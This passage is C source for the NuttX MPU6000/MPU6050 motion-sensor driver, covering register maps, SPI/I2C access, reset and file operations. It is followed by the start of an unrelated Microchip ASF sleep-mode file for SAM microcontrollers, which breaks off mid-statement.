/**************************************************************************** * drivers/sensors/mpu60x0.c * * Support for the Invensense MPU6000 and MPU6050 MotionTracking(tm) * 6-axis accelerometer and gyroscope. * * Copyright (C) 2019 Bill Gatliff. All rights reserved. * Author: Bill Gatliff <bgat@billgatliff.com> * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright+ * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * 3. Neither the name NuttX nor the names of its contributors may be * used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. * ****************************************************************************/ /**************************************************************************** * TODO: Theory of Operation ****************************************************************************/ /**************************************************************************** * Included Files ****************************************************************************/ #include <nuttx/config.h> #include <errno.h> #include <debug.h> #include <string.h> #include <limits.h> #include <nuttx/mutex.h> #include <nuttx/signal.h> #include <nuttx/compiler.h> #include <nuttx/kmalloc.h> #ifdef CONFIG_MPU60X0_SPI #include <nuttx/spi/spi.h> #else #include <nuttx/i2c/i2c_master.h> #endif #include <nuttx/fs/fs.h> #include <nuttx/sensors/mpu60x0.h> /**************************************************************************** * Pre-processor Definitions ****************************************************************************/ /* Sets bit @n */ #define BIT(n) (1 << (n)) /* Creates a mask of @m bits, i.e. MASK(2) -> 00000011 */ #define MASK(m) (BIT((m) + 1) - 1) /* Masks and shifts @v into bit field @m */ #define TO_BITFIELD(m,v) ((v) & MASK(m ##__WIDTH) << (m ##__SHIFT)) /* Un-masks and un-shifts bit field @m from @v */ #define FROM_BITFIELD(m,v) (((v) >> (m ##__SHIFT)) & MASK(m ##__WIDTH)) /* SPI read/write codes */ #define MPU_REG_READ 0x80 #define MPU_REG_WRITE 0 /**************************************************************************** * Private Types ****************************************************************************/ enum mpu_regaddr_e { SELF_TEST_X = 0x0d, SELF_TEST_Y = 0x0e, SELF_TEST_Z = 0x0f, SELF_TEST_A = 0x10, SMPLRT_DIV = 0x19, /* __SHIFT : number of empty bits to the right of the field * __WIDTH : width of the field, in bits * * single-bit fields don't have __SHIFT or __mask */ CONFIG = 0x1a, CONFIG__EXT_SYNC_SET__SHIFT = 3, CONFIG__EXT_SYNC_SET__WIDTH = 2, CONFIG__DLPF_CFG__SHIFT = 0, CONFIG__DLPF_CFG__WIDTH = 2, GYRO_CONFIG = 0x1b, GYRO_CONFIG__XG_ST = BIT(7), GYRO_CONFIG__YG_ST = BIT(6), GYRO_CONFIG__ZG_ST = BIT(5), GYRO_CONFIG__FS_SEL__SHIFT = 3, GYRO_CONFIG__FS_SEL__WIDTH = 2, ACCEL_CONFIG = 0x1c, ACCEL_CONFIG__XA_ST = BIT(7), ACCEL_CONFIG__YA_ST = BIT(6), ACCEL_CONFIG__ZA_ST = BIT(5), ACCEL_CONFIG__AFS_SEL__SHIFT = 3, ACCEL_CONFIG__AFS_SEL__WIDTH = 2, MOT_THR = 0x1f, FIFO_EN = 0x23, I2C_MST_CTRL = 0x24, I2C_SLV0_ADDR = 0x25, I2C_SLV0_REG = 0x26, I2C_SLV0_CTRL = 0x27, I2C_SLV1_ADDR = 0x28, I2C_SLV1_REG = 0x29, I2C_SLV1_CTRL = 0x2a, I2C_SLV2_ADDR = 0x2b, I2C_SLV2_REG = 0x2c, I2C_SLV2_CTRL = 0x2d, I2C_SLV3_ADDR = 0x2e, I2C_SLV3_REG = 0x2f, I2C_SLV3_CTRL = 0x30, I2C_SLV4_ADDR = 0x31, I2C_SLV4_REG = 0x32, I2C_SLV4_DO = 0x33, I2C_SLV4_CTRL = 0x34, I2C_SLV4_DI = 0x35, /* RO */ I2C_MST_STATUS = 0x36, /* RO */ INT_PIN_CFG = 0x37, INT_PIN_CFG__INT_LEVEL = BIT(7), INT_PIN_CFG__INT_OPEN = BIT(6), INT_PIN_CFG__LATCH_INT_EN = BIT(5), INT_PIN_CFG__INT_RD_CLEAR = BIT(4), INT_PIN_CFG__FSYNC_INT_LEVEL = BIT(3), INT_PIN_CFG__FSYNC_INT_EN = BIT(2), INT_PIN_CFG__I2C_BYPASS_EN = BIT(1), INT_ENABLE = 0x38, INT_STATUS = 0x3a, /* RO */ ACCEL_XOUT_H = 0x3b, /* RO */ ACCEL_XOUT_L = 0x3c, /* RO */ ACCEL_YOUT_H = 0x3d, /* RO */ ACCEL_YOUT_L = 0x3e, /* RO */ ACCEL_ZOUT_H = 0x3f, /* RO */ ACCEL_ZOUT_L = 0x40, /* RO */ TEMP_OUT_H = 0x41, /* RO */ TEMP_OUT_L = 0x42, /* RO */ GYRO_XOUT_H = 0x43, /* RO */ GYRO_XOUT_L = 0x44, /* RO */ GYRO_YOUT_H = 0x45, /* RO */ GYRO_YOUT_L = 0x46, /* RO */ GYRO_ZOUT_H = 0x47, /* RO */ GYRO_ZOUT_L = 0x48, /* RO */ EXT_SENS_DATA_00 = 0x49, /* RO */ EXT_SENS_DATA_01 = 0x4a, /* RO */ EXT_SENS_DATA_02 = 0x4b, /* RO */ EXT_SENS_DATA_03 = 0x4c, /* RO */ EXT_SENS_DATA_04 = 0x4d, /* RO */ EXT_SENS_DATA_05 = 0x4e, /* RO */ EXT_SENS_DATA_06 = 0x4f, /* RO */ EXT_SENS_DATA_07 = 0x50, /* RO */ EXT_SENS_DATA_08 = 0x51, /* RO */ EXT_SENS_DATA_09 = 0x52, /* RO */ EXT_SENS_DATA_10 = 0x53, /* RO */ EXT_SENS_DATA_11 = 0x54, /* RO */ EXT_SENS_DATA_12 = 0x55, /* RO */ EXT_SENS_DATA_13 = 0x56, /* RO */ EXT_SENS_DATA_14 = 0x57, /* RO */ EXT_SENS_DATA_15 = 0x58, /* RO */ EXT_SENS_DATA_16 = 0x59, /* RO */ EXT_SENS_DATA_17 = 0x5a, /* RO */ EXT_SENS_DATA_18 = 0x5b, /* RO */ EXT_SENS_DATA_19 = 0x5c, /* RO */ EXT_SENS_DATA_20 = 0x5d, /* RO */ EXT_SENS_DATA_21 = 0x5e, /* RO */ EXT_SENS_DATA_22 = 0x5f, /* RO */ EXT_SENS_DATA_23 = 0x60, /* RO */ I2C_SLV0_DO = 0x63, I2C_SLV1_DO = 0x64, I2C_SLV2_DO = 0x65, I2C_SLV3_DO = 0x66, I2C_MST_DELAY_CTRL = 0x67, SIGNAL_PATH_RESET = 0x68, SIGNAL_PATH_RESET__GYRO_RESET = BIT(2), SIGNAL_PATH_RESET__ACCEL_RESET = BIT(1), SIGNAL_PATH_RESET__TEMP_RESET = BIT(0), SIGNAL_PATH_RESET__ALL_RESET = BIT(3) - 1, MOT_DETECT_CTRL = 0x69, USER_CTRL = 0x6a, USER_CTRL__FIFO_EN = BIT(6), USER_CTRL__I2C_MST_EN = BIT(5), USER_CTRL__I2C_IF_DIS = BIT(4), USER_CTRL__FIFO_RESET = BIT(2), USER_CTRL__I2C_MST_RESET = BIT(1), USER_CTRL__SIG_COND_RESET = BIT(0), PWR_MGMT_1 = 0x6b, /* Reset: 0x40 */ PWR_MGMT_1__DEVICE_RESET = BIT(7), PWR_MGMT_1__SLEEP = BIT(6), PWR_MGMT_1__CYCLE = BIT(5), PWR_MGMT_1__TEMP_DIS = BIT(3), PWR_MGMT_1__CLK_SEL__SHIFT = 0, PWR_MGMT_1__CLK_SEL__WIDTH = 3, PWR_MGMT_2 = 0x6c, FIFO_COUNTH = 0x72, FIFO_COUNTL = 0x73, FIFO_R_W = 0x74, WHO_AM_I = 0x75, /* RO reset: 0x68 */ }; /* Describes the mpu60x0 sensor register file. This structure reflects * the underlying hardware, so don't change it! */ begin_packed_struct struct sensor_data_s { int16_t x_accel; int16_t y_accel; int16_t z_accel; int16_t temp; int16_t x_gyro; int16_t y_gyro; int16_t z_gyro; } end_packed_struct; /* Used by the driver to manage the device */ struct mpu_dev_s { mutex_t lock; /* mutex for this structure */ struct mpu_config_s config; /* board-specific information */ struct sensor_data_s buf; /* temporary buffer (for read(), etc.) */ size_t bufpos; /* cursor into @buf, in bytes (!) */ }; /**************************************************************************** * Private Function Function Prototypes ****************************************************************************/ static int mpu_open(FAR struct file *filep); static int mpu_close(FAR struct file *filep); static ssize_t mpu_read(FAR struct file *filep, FAR char *buf, size_t len); static ssize_t mpu_write(FAR struct file *filep, FAR const char *buf, size_t len); static off_t mpu_seek(FAR struct file *filep, off_t offset, int whence); static int mpu_ioctl(FAR struct file *filep, int cmd, unsigned long arg); /**************************************************************************** * Private Data ****************************************************************************/ static const struct file_operations g_mpu_fops = { mpu_open, mpu_close, mpu_read, mpu_write, mpu_seek, mpu_ioctl, NULL #ifndef CONFIG_DISABLE_PSEUDOFS_OPERATIONS , NULL #endif }; /**************************************************************************** * Private Functions ****************************************************************************/ /* NOTE : * * In all of the following code, functions named with a double leading * underscore '__' must be invoked ONLY if the mpu_dev_s lock is * already held. Failure to do this might cause the transaction to get * interrupted, which will likely confuse the data you get back. * * The mpu_dev_s lock is NOT the same thing as, i.e. the SPI master * interface lock: the latter protects the bus interface hardware * (which may have other SPI devices attached), the former protects * the chip and its associated data. */ #ifdef CONFIG_MPU60X0_SPI /* __mpu_read_reg(), but for spi-connected devices. See that function * for documentation. */ static int __mpu_read_reg_spi(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR uint8_t *buf, uint8_t len) { int ret; FAR struct spi_dev_s *spi = dev->config.spi; int id = dev->config.spi_devid; /* We'll probably return the number of bytes asked for. */ ret = len; /* Grab and configure the SPI master device: always mode 0, 20MHz if it's a * data register, 1MHz otherwise (per datasheet). */ SPI_LOCK(spi, true); SPI_SETMODE(spi, SPIDEV_MODE0); if ((reg_addr >= ACCEL_XOUT_H) && ((reg_addr + len) <= I2C_SLV0_DO)) { SPI_SETFREQUENCY(spi, 20000000); } else { SPI_SETFREQUENCY(spi, 1000000); } /* Select the chip. */ SPI_SELECT(spi, id, true); /* Send the read request. */ SPI_SEND(spi, reg_addr | MPU_REG_READ); /* Clock in the data. */ while (0 != len--) { *buf++ = (uint8_t) (SPI_SEND(spi, 0xff)); } /* Deselect the chip, release the SPI master. */ SPI_SELECT(spi, id, false); SPI_LOCK(spi, false); return ret; } /* __mpu_write_reg(), but for SPI connections. */ static int __mpu_write_reg_spi(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR const uint8_t * buf, uint8_t len) { int ret; FAR struct spi_dev_s *spi = dev->config.spi; int id = dev->config.spi_devid; /* Hopefully, we'll return all the bytes they're asking for. */ ret = len; /* Grab and configure the SPI master device. */ SPI_LOCK(spi, true); SPI_SETMODE(spi, SPIDEV_MODE0); SPI_SETFREQUENCY(spi, 1000000); /* Select the chip. */ SPI_SELECT(spi, id, true); /* Send the write request. */ SPI_SEND(spi, reg_addr | MPU_REG_WRITE); /* Send the data. */ while (0 != len--) { SPI_SEND(spi, *buf++); } /* Release the chip and SPI master. */ SPI_SELECT(spi, id, false); SPI_LOCK(spi, false); return ret; } #else /* __mpu_read_reg(), but for i2c-connected devices. */ static int __mpu_read_reg_i2c(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR uint8_t *buf, uint8_t len) { int ret; struct i2c_msg_s msg[2]; msg[0].frequency = CONFIG_MPU60X0_I2C_FREQ; msg[0].addr = dev->config.addr; msg[0].flags = I2C_M_NOSTOP; msg[0].buffer = &reg_addr; msg[0].length = 1; msg[1].frequency = CONFIG_MPU60X0_I2C_FREQ; msg[1].addr = dev->config.addr; msg[1].flags = I2C_M_READ; msg[1].buffer = buf; msg[1].length = len; ret = I2C_TRANSFER(dev->config.i2c, msg, 2); if (ret < 0) { snerr("ERROR: I2C_TRANSFER(read) failed: %d\n", ret); return ret; } return OK; } static int __mpu_write_reg_i2c(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR const uint8_t *buf, uint8_t len) { int ret; struct i2c_msg_s msg[2]; msg[0].frequency = CONFIG_MPU60X0_I2C_FREQ; msg[0].addr = dev->config.addr; msg[0].flags = I2C_M_NOSTOP; msg[0].buffer = &reg_addr; msg[0].length = 1; msg[1].frequency = CONFIG_MPU60X0_I2C_FREQ; msg[1].addr = dev->config.addr; msg[1].flags = I2C_M_NOSTART; msg[1].buffer = (FAR uint8_t *)buf; msg[1].length = len; ret = I2C_TRANSFER(dev->config.i2c, msg, 2); if (ret < 0) { snerr("ERROR: I2C_TRANSFER(write) failed: %d\n", ret); return ret; } return OK; } #endif /* CONFIG_MPU60X0_SPI */ /* __mpu_read_reg() * * Reads a block of @len byte-wide registers, starting at @reg_addr, * from the device connected to @dev. Bytes are returned in @buf, * which must have a capacity of at least @len bytes. * * Note: The caller must hold @dev->lock before calling this function. * * Returns number of bytes read, or a negative errno. */ static inline int __mpu_read_reg(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR uint8_t *buf, uint8_t len) { #ifdef CONFIG_MPU60X0_SPI /* If we're wired to SPI, use that function. */ if (dev->config.spi != NULL) { return __mpu_read_reg_spi(dev, reg_addr, buf, len); } #else /* If we're wired to I2C, use that function. */ if (dev->config.i2c != NULL) { return __mpu_read_reg_i2c(dev, reg_addr, buf, len); } #endif /* If we get this far, it's because we can't "find" our device. */ return -ENODEV; } /* __mpu_write_reg() * * Writes a block of @len byte-wide registers, starting at @reg_addr, * using the values in @buf to the device connected to @dev. Register * values are taken in numerical order from @buf, i.e.: * * buf[0] -> register[@reg_addr] * buf[1] -> register[@reg_addr + 1] * ... * * Note: The caller must hold @dev->lock before calling this function. * * Returns number of bytes written, or a negative errno. */ static inline int __mpu_write_reg(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR const uint8_t *buf, uint8_t len) { #ifdef CONFIG_MPU60X0_SPI /* If we're connected to SPI, use that function. */ if (dev->config.spi != NULL) { return __mpu_write_reg_spi(dev, reg_addr, buf, len); } #else if (dev->config.i2c != NULL) { return __mpu_write_reg_i2c(dev, reg_addr, buf, len); } #endif /* If we get this far, it's because we can't "find" our device. */ return -ENODEV; } /* __mpu_read_imu() * * Reads the whole IMU data file from @dev in one uninterrupted pass, * placing the sampled values into @buf. This function is the only way * to guarantee that the measured values are sampled as closely-spaced * in time as the hardware permits, which is almost always what you * want. */ static inline int __mpu_read_imu(FAR struct mpu_dev_s *dev, FAR struct sensor_data_s *buf) { return __mpu_read_reg(dev, ACCEL_XOUT_H, (uint8_t *) buf, sizeof(*buf)); } /* __mpu_read_pwr_mgmt_1() * * Returns the value of the PWR_MGMT_1 register from @dev. */ static inline uint8_t __mpu_read_pwr_mgmt_1(FAR struct mpu_dev_s *dev) { uint8_t buf = 0xff; __mpu_read_reg(dev, PWR_MGMT_1, &buf, sizeof(buf)); return buf; } static inline int __mpu_write_signal_path_reset(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, SIGNAL_PATH_RESET, &val, sizeof(val)); } static inline int __mpu_write_int_pin_cfg(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, INT_PIN_CFG, &val, sizeof(val)); } static inline int __mpu_write_pwr_mgmt_1(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, PWR_MGMT_1, &val, sizeof(val)); } static inline int __mpu_write_pwr_mgmt_2(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, PWR_MGMT_2, &val, sizeof(val)); } static inline int __mpu_write_user_ctrl(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, USER_CTRL, &val, sizeof(val)); } /* __mpu_write_gyro_config() : * * Sets the @fs_sel bit in GYRO_CONFIG to the value provided. Per the * datasheet, the meaning of @fs_sel is as follows: * * GYRO_CONFIG(0x1b) : XG_ST YG_ST ZG_ST FS_SEL1 FS_SEL0 x x x * * XG_ST, YG_ST, ZG_ST : self-test (unsupported in this driver) * 1 -> activate self-test on X, Y, and/or Z gyros * * FS_SEL[10] : full-scale range select * 0 -> ± 250 deg/sec * 1 -> ± 500 deg/sec * 2 -> ± 1000 deg/sec * 3 -> ± 2000 deg/sec */ static inline int __mpu_write_gyro_config(FAR struct mpu_dev_s *dev, uint8_t fs_sel) { uint8_t val = TO_BITFIELD(GYRO_CONFIG__FS_SEL, fs_sel); return __mpu_write_reg(dev, GYRO_CONFIG, &val, sizeof(val)); } /* __mpu_write_accel_config() : * * Sets the @afs_sel bit in ACCEL_CONFIG to the value provided. Per * the datasheet, the meaning of @afs_sel is as follows: * * ACCEL_CONFIG(0x1c) : XA_ST YA_ST ZA_ST AFS_SEL1 AFS_SEL0 x x x * * XA_ST, YA_ST, ZA_ST : self-test (unsupported in this driver) * 1 -> activate self-test on X, Y, and/or Z accelerometers * * AFS_SEL[10] : full-scale range select * 0 -> ± 2 g * 1 -> ± 4 g * 2 -> ± 8 g * 3 -> ± 16 g */ static inline int __mpu_write_accel_config(FAR struct mpu_dev_s *dev, uint8_t afs_sel) { uint8_t val = TO_BITFIELD(ACCEL_CONFIG__AFS_SEL, afs_sel); return __mpu_write_reg(dev, ACCEL_CONFIG, &val, sizeof(val)); } /* CONFIG (0x1a) : x x EXT_SYNC_SET[2..0] DLPF_CFG[2..0] * * EXT_SYNC_SET : frame sync bit position * DLPF_CFG : digital low-pass filter bandwidth * (see datasheet, it's ... complicated) */ static inline int __mpu_write_config(FAR struct mpu_dev_s *dev, uint8_t ext_sync_set, uint8_t dlpf_cfg) { uint8_t val = TO_BITFIELD(CONFIG__EXT_SYNC_SET, ext_sync_set) | TO_BITFIELD(CONFIG__DLPF_CFG, dlpf_cfg); return __mpu_write_reg(dev, CONFIG, &val, sizeof(val)); } /* WHO_AM_I (0x75) : read-only, always returns 0x68 for mpu60x0 */ static inline uint8_t __mpu_read_who_am_i(FAR struct mpu_dev_s *dev) { uint8_t val = 0xff; __mpu_read_reg(dev, WHO_AM_I, &val, sizeof(val)); return val; } /* Locks and unlocks the @dev data structure (mutex). * * Use these functions any time you call one of the lock-dependent * helper functions defined above. */ static void inline mpu_lock(FAR struct mpu_dev_s *dev) { nxmutex_lock(&dev->lock); } static void inline mpu_unlock(FAR struct mpu_dev_s *dev) { nxmutex_unlock(&dev->lock); } /* Resets the mpu60x0, sets it to a default configuration. */ static int mpu_reset(FAR struct mpu_dev_s *dev) { #ifdef CONFIG_MPU60X0_SPI if (dev->config.spi == NULL) { return -EINVAL; } #else if (dev->config.i2c == NULL) { return -EINVAL; } #endif mpu_lock(dev); /* Awaken chip, issue hardware reset */ __mpu_write_pwr_mgmt_1(dev, PWR_MGMT_1__DEVICE_RESET); /* Wait for reset cycle to finish (note: per the datasheet, we don't need * to hold NSS for this) */ do { nxsig_usleep(50000); /* usecs (arbitrary) */ } while (__mpu_read_pwr_mgmt_1(dev) & PWR_MGMT_1__DEVICE_RESET); /* Reset signal paths */ __mpu_write_signal_path_reset(dev, SIGNAL_PATH_RESET__ALL_RESET); nxsig_usleep(2000); /* Disable SLEEP, use PLL with z-axis clock source */ __mpu_write_pwr_mgmt_1(dev, 3); nxsig_usleep(2000); /* Disable i2c if we're on spi. */ #ifdef CONFIG_MPU60X0_SPI if (dev->config.spi) { __mpu_write_user_ctrl(dev, USER_CTRL__I2C_IF_DIS); } #endif /* Disable low-power mode, enable all gyros and accelerometers */ __mpu_write_pwr_mgmt_2(dev, 0); /* No FSYNC, set accel LPF at 184 Hz, gyro LPF at 188 Hz */ __mpu_write_config(dev, 0, 1); /* ± 1000 deg/sec */ __mpu_write_gyro_config(dev, 2); /* ± 8g */ __mpu_write_accel_config(dev, 2); /* clear INT on any read (we aren't using that pin right now) */ __mpu_write_int_pin_cfg(dev, INT_PIN_CFG__INT_RD_CLEAR); mpu_unlock(dev); return 0; } /**************************************************************************** * Name: mpu_open * * Note: we don't deal with multiple users trying to access this interface at * the same time. Until further notice, don't do that. * * And no, it's not as simple as just prohibiting concurrent opens or * reads with a mutex: there are legit reasons for truy concurrent * access, but they must be treated carefully in this interface lest a * partial reader end up with a mixture of old and new samples. This * will make some users unhappy. * ****************************************************************************/ static int mpu_open(FAR struct file *filep) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; /* Reset the register cache */ mpu_lock(dev); dev->bufpos = 0; mpu_unlock(dev); return 0; } /**************************************************************************** * Name: mpu_close ****************************************************************************/ static int mpu_close(FAR struct file *filep) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; /* Reset (clear) the register cache. */ mpu_lock(dev); dev->bufpos = 0; mpu_unlock(dev); return 0; } /**************************************************************************** * Name: mpu_read * * Returns a snapshot of the accelerometer, temperature, and gyro registers. * * Note: the chip uses traditional, twos-complement notation, i.e. "0" * is encoded as 0, and full-scale-negative is 0x8000, and * full-scale-positive is 0x7fff. If we read the registers * sequentially and directly into memory (as we do), the measurements * from each sensor are captured as big endian words. * * In contrast, ASN.1 maps "0" to 0x8000, full-scale-negative to 0, * and full-scale-positive to 0xffff. So if we want to send in a * format that an ASN.1 PER-decoder would recognize, must: * * 1. Treat the register data/measurements as unsigned, * 2. Add 0x8000 to each measurement, and then, * 3. Send each word in big-endian order. * * The result of the above will be something you could neatly describe * like this (confirmed with asn1scc): * * Sint16 ::= INTEGER(-32768..32767) * * Mpu60x0Sample ::= SEQUENCE * { * accel-X Sint16, * accel-Y Sint16, * accel-Z Sint16, * temp Sint16, * gyro-X Sint16, * gyro-Y Sint16, * gyro-Z Sint16 * } * ****************************************************************************/ static ssize_t mpu_read(FAR struct file *filep, FAR char *buf, size_t len) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; size_t send_len = 0; mpu_lock(dev); /* Populate the register cache if it seems empty. */ if (!dev->bufpos) { __mpu_read_imu(dev, &dev->buf); } /* Send the lesser of: available bytes, or amount requested. */ send_len = sizeof(dev->buf) - dev->bufpos; if (send_len > len) { send_len = len; } if (send_len) { memcpy(buf, ((uint8_t *)&dev->buf) + dev->bufpos, send_len); } /* Move the cursor, to mark them as sent. */ dev->bufpos += send_len; /* If we've sent the last byte, reset the buffer. */ if (dev->bufpos >= sizeof(dev->buf)) { dev->bufpos = 0; } mpu_unlock(dev); return send_len; } /**************************************************************************** * Name: mpu_write ****************************************************************************/ static ssize_t mpu_write(FAR struct file *filep, FAR const char *buf, size_t len) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; UNUSED(inode); UNUSED(dev); snerr("ERROR: %p %p %d\n", inode, dev, len); return len; } /**************************************************************************** * Name: mpu60x0_seek ****************************************************************************/ static off_t mpu_seek(FAR struct file *filep, off_t offset, int whence) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; UNUSED(inode); UNUSED(dev); snerr("ERROR: %p %p\n", inode, dev); return 0; } /**************************************************************************** * Name: mpu60x0_ioctl ****************************************************************************/ static int mpu_ioctl(FAR struct file *filep, int cmd, unsigned long arg) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; UNUSED(inode); UNUSED(dev); snerr("ERROR: %p %p\n", inode, dev); /* ENOTTY is the standard return if an IOCTL command is not supported. */ return -ENOTTY; } /**************************************************************************** * Public Functions ****************************************************************************/ /**************************************************************************** * Name: mpu60x0_register * * Description: * Registers the mpu60x0 interface as 'devpath' * * Input Parameters: * devpath - The full path to the interface to register. E.g., "/dev/imu0" * spi - SPI interface for chip communications * config - Configuration information * * Returned Value: * Zero (OK) on success; a negated errno value on failure. * ****************************************************************************/ int mpu60x0_register(FAR const char *path, FAR struct mpu_config_s *config) { FAR struct mpu_dev_s *priv; int ret; /* Without config info, we can't do anything. */ if (config == NULL) { return -EINVAL; } /* Initialize the device structure. */ priv = (FAR struct mpu_dev_s *)kmm_malloc(sizeof(struct mpu_dev_s)); if (priv == NULL) { snerr("ERROR: Failed to allocate mpu60x0 device instance\n"); return -ENOMEM; } memset(priv, 0, sizeof(*priv)); nxmutex_init(&priv->lock); /* Keep a copy of the config structure, in case the caller discards * theirs. */ priv->config = *config; /* Register the device node. */ ret = register_driver(path, &g_mpu_fops, 0666, priv); if (ret < 0) { snerr("ERROR: Failed to register mpu60x0 interface: %d\n", ret); nxmutex_destroy(&priv->lock); kmm_free(priv); return ret; } /* Reset the chip, to give it an initial configuration. */ return mpu_reset(priv); }
979087.c
/** * \file * * \brief Sleep mode access * * Copyright (c) 2012-2018 Microchip Technology Inc. and its subsidiaries. * * \asf_license_start * * \page License * * Subject to your compliance with these terms, you may use Microchip * software and any derivatives exclusively with Microchip products. * It is your responsibility to comply with third party license terms applicable * to your use of third party software (including open source software) that * may accompany Microchip software. * * THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, * WHETHER EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, * INCLUDING ANY IMPLIED WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, * AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT WILL MICROCHIP BE * LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE, INCIDENTAL OR CONSEQUENTIAL * LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND WHATSOEVER RELATED TO THE * SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS BEEN ADVISED OF THE * POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE FULLEST EXTENT * ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN ANY WAY * RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY, * THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE. * * \asf_license_stop * */ /* * Support and FAQ: visit <a href="https://www.microchip.com/support/">Microchip Support</a> */ #include <compiler.h> #include "sleep.h" /* SAM3,SAM4,SAMG,SAMV,SAMS and SAME series */ #if (SAM3S || SAM3N || SAM3XA || SAM3U || SAM4S || SAM4E || SAM4N || SAM4C || \ SAM4CM || SAMG || SAM4CP || SAMV71 || SAMV70 || SAMS70 || SAME70) # include "pmc.h" # include "board.h" /* Checking board configuration of main clock xtal statup time */ #if !defined(BOARD_OSC_STARTUP_US) # warning The board main clock xtal statup time has not been defined. Using default settings. # define BOARD_OSC_STARTUP_US (15625UL) #endif #if !defined(EFC0) # define EFC0 EFC #endif /** * Save clock settings and shutdown PLLs */ __always_inline static void pmc_save_clock_settings( uint32_t *p_osc_setting, uint32_t *p_pll0_setting, uint32_t *p_pll1_setting, uint32_t *p_mck_setting, uint32_t *p_fmr_setting, #if defined(EFC1) uint32_t *p_fmr_setting1, #endif const bool disable_xtal) { uint32_t mor = PMC->CKGR_MOR; uint32_t mckr = PMC->PMC_MCKR; uint32_t fmr = EFC0->EEFC_FMR; # if defined(EFC1) uint32_t fmr1 = EFC1->EEFC_FMR; # endif if (p_osc_setting) { *p_osc_setting = mor; } if (p_pll0_setting) { *p_pll0_setting = PMC->CKGR_PLLAR; } if (p_pll1_setting) { #if (SAM3S || SAM4S || SAM4C || SAM4CM || SAM4CP) *p_pll1_setting = PMC->CKGR_PLLBR; #elif (SAM3U || SAM3XA) *p_pll1_setting = PMC->CKGR_UCKR; #else *p_pll1_setting = 0; #endif } if (p_mck_setting) { *p_mck_setting = mckr; } if (p_fmr_setting) { *p_fmr_setting = fmr; } #if defined(EFC1) if (p_fmr_setting1) { *p_fmr_setting1 = fmr1; } #endif /* Enable FAST RC */ PMC->CKGR_MOR = CKGR_MOR_KEY_PASSWD | mor | CKGR_MOR_MOSCRCEN; /* if MCK source is PLL, switch to mainck */ if ((mckr & PMC_MCKR_CSS_Msk) > PMC_MCKR_CSS_MAIN_CLK) { /* MCK -> MAINCK */ mckr = (mckr & (~PMC_MCKR_CSS_Msk)) | PMC_MCKR_CSS_MAIN_CLK; PMC->PMC_MCKR = mckr; while(!(PMC->PMC_SR & PMC_SR_MCKRDY)); } /* MCK prescale -> 1 */ if (mckr & PMC_MCKR_PRES_Msk) { mckr = (mckr & (~PMC_MCKR_PRES_Msk)); PMC->PMC_MCKR = mckr; while(!(PMC->PMC_SR & PMC_SR_MCKRDY)); } /* Disable PLLs */ pmc_disable_pllack(); #if (SAM3S || SAM4S || SAM4C || SAM4CM || SAM4CP) pmc_disable_pllbck(); #elif (SAM3U || SAM3XA) pmc_disable_upll_clock(); #endif /* Prepare for entering WAIT mode */ /* Wait fast RC ready */ while (!(PMC->PMC_SR & PMC_SR_MOSCRCS)); /* Switch mainck to FAST RC */ #if SAMG /** * For the sleepwalking feature, we need an accurate RC clock. Only 24M and * 16M are trimmed in production. Here we select the 24M. * And so wait state need to be 1. */ EFC0->EEFC_FMR = (fmr & (~EEFC_FMR_FWS_Msk)) | 